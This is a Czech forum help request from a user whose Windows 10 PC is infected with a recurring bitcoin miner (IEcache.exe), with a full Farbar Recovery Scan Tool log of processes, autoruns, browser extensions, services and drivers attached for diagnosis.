BitCoin Miner - IECache.exe

[Cryman]

Zdravíčko, obracím se na Vás o radu ohledně viru bitcoin mineru . Mám 100% CPU Usage a bohužel Malwarebytes i přesto že najde vir tak jej nedokáže odstranit - po restartu je zpět. Proto přikládám log z FRST, předem mnohokrát děkuji za Vaší ochotu a Váš čas!

FRST log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 23.08.2018
Ran by cheat (administrator) on DESKTOP-1JRDM4L (24-08-2018 21:34:35)
Running from C:\Users\cheat\Desktop
Loaded Profiles: cheat (Available Profiles: cheat)
Platform: Windows 10 Pro Version 1803 17134.228 (X64) Language: Čeština (Česko)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

Failed to access process -> Secure System
(Microsoft Corporation) C:\Windows\System32\LsaIso.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AXSP\4.00.01\atkexComSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.28\AsusFanControlService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Digital Wave Ltd.) C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\LightingService\LightingService.exe
() C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.22\AsSysCtrlService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Microsoft Corporation) C:\Windows\System32\vmms.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
() C:\Program Files (x86)\Steam\steamapps\common\wallpaper_engine\bin\wallpaperservice32_c.exe
(Microsoft Corporation) C:\Windows\System32\vmcompute.exe
() C:\Program Files (x86)\LightingService\AsRogAuraGpuDllServer.exe
() C:\Program Files (x86)\ASUS\AI Suite III\EZ Update\EzUpdt.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
(ASUSTeK COMPUTER INC.) C:\Program Files (x86)\ASUS\GPU TweakII\GPUTweakII.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.0_x64__8wekyb3d8bbwe\Office16\OfficeHubTaskHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
() C:\Users\cheat\AppData\Roaming\sui.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\USB 3.0 Boost\U3BoostSvr64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(BitTorrent, Inc.) C:\Users\cheat\AppData\Roaming\uTorrent\utorrent.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(ASUS) C:\Program Files (x86)\ASUS\ASUS ROG Gaming Mouse GX1000\Hid.exe
(ASUS) C:\Program Files (x86)\ASUS\ASUS ROG Gaming Mouse GX1000\TrayIcon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Windows\System32\schtasks.exe
(ShareX Team) C:\Program Files\ShareX\ShareX.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(ASUSTeK COMPUTER INC.) C:\Program Files (x86)\ASUS\GPU TweakII\Monitor.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Intel(R) Corporation) C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\XtuService.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18071.14820.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Ghisler Software GmbH) C:\totalcmd\TOTALCMD64.EXE
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Microsoft Corporation) C:\Windows\System32\schtasks.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\cheat\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
() C:\Windows\IEcache.exe
() C:\Windows\IEcache.exe
() C:\Windows\IEcache.exe
() C:\Windows\IEcache.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9228800 2017-06-29] (Realtek Semiconductor)
HKLM-x32\...\Run: [ASUS GX1000] => C:\Program Files (x86)\ASUS\ASUS ROG Gaming Mouse GX1000\Hid.exe [1854976 2012-10-25] (ASUS)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [Google Update] => C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\GoogleUpdateCore.exe [601680 2018-06-02] (Google Inc.)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [4100152 2018-06-02] (Tonec Inc.)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3201312 2018-06-09] (Valve Corporation)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [qBittorrent] => "C:\Program Files\qBittorrent\qbittorrent.exe"
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [Spotify] => C:\Users\cheat\AppData\Roaming\Spotify\Spotify.exe [24453008 2018-08-23] (Spotify Ltd)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Run: [uTorrent] => C:\Users\cheat\AppData\Roaming\uTorrent\utorrent.exe [416168 2015-02-22] (BitTorrent, Inc.)
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\MountPoints2: {a2ef062f-a39b-11e8-ab75-ac220bc546a4} - "D:\Lenovo_Suite.exe"
HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\MountPoints2: {a2ef065f-a39b-11e8-ab75-ac220bc546a4} - "D:\Lenovo_Suite.exe"
InternetURL: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Revenge.URL -> URL: file:///C:\Users\cheat\AppData\Roaming\sui.exe
Startup: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\setupm.js [2018-07-27] ()
Startup: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ShareX.lnk [2018-07-01]
ShortcutTarget: ShareX.lnk -> C:\Program Files\ShareX\ShareX.exe (ShareX Team)
Startup: C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.js.lnk [2018-08-21]
ShortcutTarget: Update.js.lnk -> C:\Users\cheat\AppData\Local\Temp\Update.js ()
GroupPolicy: Restriction ? <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{7652fcd8-0820-44e0-a6d7-3b768b453d55}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{7f284cae-ca04-4d88-acef-cd41db740f03}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{f39b9dd4-1e2b-460f-8b1c-417c10375737}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2017-12-14] (Internet Download Manager, Tonec Inc.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_181\bin\ssv.dll [2018-07-19] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-07-19] (Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2017-12-14] (Internet Download Manager, Tonec Inc.)

FireFox:
========
FF DefaultProfile: sctnr9hv.default
FF ProfilePath: C:\Users\cheat\AppData\Roaming\Mozilla\Firefox\Profiles\sctnr9hv.default [2018-07-27]
FF HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Firefox\Extensions: [mozilla_cc3@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2018-02-28]
FF HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\cheat\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\cheat\AppData\Roaming\IDM\idmmzcc5 [2018-06-02] [Legacy] [not signed]
FF HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Legacy]
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-07-19] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-07-19] (Oracle Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-05-29] (VideoLAN)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-06-24] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-06-24] (NVIDIA Corporation)
FF Plugin-x32: @tools.asus.com/ASUS Update;version=3 -> C:\Program Files (x86)\ASUS\Update\1.3.101.0\npAsusUpdate3.dll [2018-06-03] (ASUSTeK Computer Inc.)
FF Plugin-x32: @tools.asus.com/ASUS Update;version=9 -> C:\Program Files (x86)\ASUS\Update\1.3.101.0\npAsusUpdate3.dll [2018-06-03] (ASUSTeK Computer Inc.)
FF Plugin HKU\S-1-5-21-1409225181-4065645274-1912239689-1002: @tools.google.com/Google Update;version=3 -> C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-06-02] (Google Inc.)
FF Plugin HKU\S-1-5-21-1409225181-4065645274-1912239689-1002: @tools.google.com/Google Update;version=9 -> C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-06-02] (Google Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxps://news.google.cz/
CHR StartupUrls: Default -> "hxxp://www.google.cz/"
CHR DefaultSearchKeyword: Default -> lp
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default [2018-08-24]
CHR Extension: (Prezentace) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-02]
CHR Extension: (Dokumenty) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-02]
CHR Extension: (Disk Google) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-02]
CHR Extension: (MEGA) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2018-08-24]
CHR Extension: (YouTube) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-02]
CHR Extension: (Pushbullet) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\chlffgpmiacpedhhbkiomidkjlcfhogd [2018-08-17]
CHR Extension: (uBlock Origin) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2018-08-14]
CHR Extension: (Clear Cache) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\cppjkneekbjaeellbfkmgnhonkkjfpdn [2018-06-02]
CHR Extension: (Dark Mode) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\dmghijelimhndkbmpgbldicpogfkceaj [2018-08-18]
CHR Extension: (Session Buddy) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\edacconmaakjimmfgnblocblbcdcpbko [2018-06-02]
CHR Extension: (Hudba Google Play) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2018-07-18]
CHR Extension: (Toolkit For FB) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcachklhcihfinmagjnlomehfdhndhep [2018-08-22]
CHR Extension: (Lightstream) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fccoaofanbnnabehannjhhakiibdpdjg [2018-07-01]
CHR Extension: (Tabulky) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-02]
CHR Extension: (Stylish - Custom themes for any website) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnbnpbmkenffdnngjfgmeleoegfcffe [2018-06-22]
CHR Extension: (Unshorten.link) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbobdaaeaihkghbokihkofcbndhmbdpd [2018-06-02]
CHR Extension: (Dokumenty Google offline) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-16]
CHR Extension: (AdBlock) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-07-25]
CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2018-08-23]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2018-08-23]
CHR Extension: (Just Delete Me) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\hfpofkfbabpbbmchmiekfnlcgaedbgcf [2018-07-05]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2018-06-19]
CHR Extension: (PictureMate - View tagged FB pics) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\khmlalkcjmglpgdkmkmmgjcajahkoigj [2018-07-26]
CHR Extension: (Linkclump) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\lfpjkncokllnfokkgpkobnkbkmelfefj [2018-06-09]
CHR Extension: (Facebook Screen Sharing) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ncfpggehkhmjpdjpefomjchjafhmbnai [2018-06-11]
CHR Extension: (The Space ) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nchoeafalnaacdkpoodkjnbogigpjabk [2018-07-08]
CHR Extension: (IDM Integration Module) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-06-23]
CHR Extension: (Super Dark Mode) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlgphodeccebbcnkgmokeegopgpnjfkc [2018-08-23]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-02]
CHR Extension: (Chrome Apps & Extensions Developer Tool) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohmmkhmmmpcnpikjeljgnaoabkaalbgc [2018-06-02]
CHR Extension: (Spořič dat) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfmgfdlgomnbgkofeojodiodmgpgmkac [2018-06-04]
CHR Extension: (Gmail) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-02]
CHR Extension: (Chrome Media Router) - C:\Users\cheat\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-08-10]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2018-03-30]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2018-03-30]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2018-04-27] (Apple Inc.)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\4.00.01\atkexComSvc.exe [382424 2018-01-05] (ASUSTeK Computer Inc.)
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2013-08-01] (ASUSTeK Computer Inc.)
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.22\AsSysCtrlService.exe [1360016 2015-08-20] () [File not signed]
S2 asus; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [157016 2018-06-03] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.28\AsusFanControlService.exe [398648 2015-08-20] (ASUSTeK Computer Inc.)
S3 asusm; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [157016 2018-06-03] (ASUSTeK Computer Inc.)
R2 DigitalWave.Update.Service; C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe [440808 2018-08-02] (Digital Wave Ltd.)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [779392 2018-07-22] (EasyAntiCheat Ltd)
S3 HgClientService; C:\Windows\system32\hgclientservice.dll [141824 2018-06-09] (Microsoft Corporation)
R3 hns; C:\Windows\System32\HostNetSvc.dll [1709056 2018-07-14] (Microsoft Corporation)
R2 Intel(R) PROSet Monitoring Service; C:\Windows\system32\IProsetMonitor.exe [505856 2018-01-31] (Intel Corporation) [File not signed]
R2 LightingService; C:\Program Files (x86)\LightingService\LightingService.exe [1276376 2018-04-25] (ASUSTek Computer Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6541008 2018-05-09] (Malwarebytes)
R3 nvagent; C:\Windows\System32\NvAgent.dll [31232 2018-06-09] (Microsoft Corporation)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [764352 2018-05-23] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [764352 2018-05-23] (NVIDIA Corporation)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Corporation)
S4 ssh-agent; C:\Windows\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11293936 2018-04-03] (TeamViewer GmbH)
R3 vmcompute; C:\Windows\system32\vmcompute.exe [3014656 2018-08-03] (Microsoft Corporation)
R2 vmms; C:\Windows\system32\vmms.exe [15202816 2018-05-20] (Microsoft Corporation)
R2 Wallpaper Engine Service; C:\Program Files (x86)\Steam\steamapps\common\wallpaper_engine\bin\wallpaperservice32_c.exe [348136 2018-06-03] ()
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\NisSrv.exe [4682552 2018-06-03] (Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MsMpEng.exe [101096 2018-06-03] (Microsoft Corporation)
R2 XTU3SERVICE; C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\XtuService.exe [18736 2018-05-17] (Intel(R) Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AIDA64Driver; C:\Program Files (x86)\AIDA64\kerneld.x64 [45696 2018-04-15] ()
S3 AppleKmdfFilter; C:\Windows\System32\drivers\AppleKmdfFilter.sys [20640 2018-04-26] (Apple Inc.)
S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35560 2018-04-26] (Apple Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-03] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2012-09-14] ()
R3 ASUSFILTER; C:\Windows\SysWow64\drivers\ASUSFILTER.sys [46152 2011-09-20] (MCCI Corporation)
R3 DroidCam; C:\Windows\system32\DRIVERS\droidcam.sys [33592 2015-05-24] (Dev47Apps)
R3 DroidCamVideo; C:\Windows\system32\DRIVERS\droidcamvideo.sys [230712 2015-05-24] (Windows (R) Win 7 DDK provider)
R3 FocusriteUSB; C:\Windows\System32\drivers\FocusriteUSB.sys [96400 2018-01-09] (Focusrite Audio Engineering Ltd.)
R3 FocusriteUSBAudio; C:\Windows\system32\drivers\FocusriteUSBAudio.sys [54416 2018-01-09] (Focusrite Audio Engineering Ltd.)
R3 FocusriteUSBSwRoot; C:\Windows\System32\drivers\FocusriteUSBSwRoot.sys [97936 2018-01-09] (Focusrite Audio Engineering Ltd.)
R1 GLCKIO2; C:\Windows\system32\drivers\GLCKIO2.sys [19392 2018-04-23] ()
R3 GX1000MS; C:\Windows\system32\drivers\GX1000MS.sys [25600 2012-06-27] ( )
R3 hvsocketcontrol; C:\Windows\system32\drivers\hvsocketcontrol.sys [26624 2018-06-09] (Microsoft Corporation)
R2 iocbios2; C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\Drivers\IocDriver\64bit\iocbios2.sys [37104 2018-05-09] (Intel Corporation)
R3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [34064 2017-05-08] (ASUSTeK Computer Inc.)
S3 lunparser; C:\Windows\System32\drivers\lunparser.sys [23040 2018-06-09] (Microsoft Corporation)
R0 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [259360 2018-08-19] (Malwarebytes)
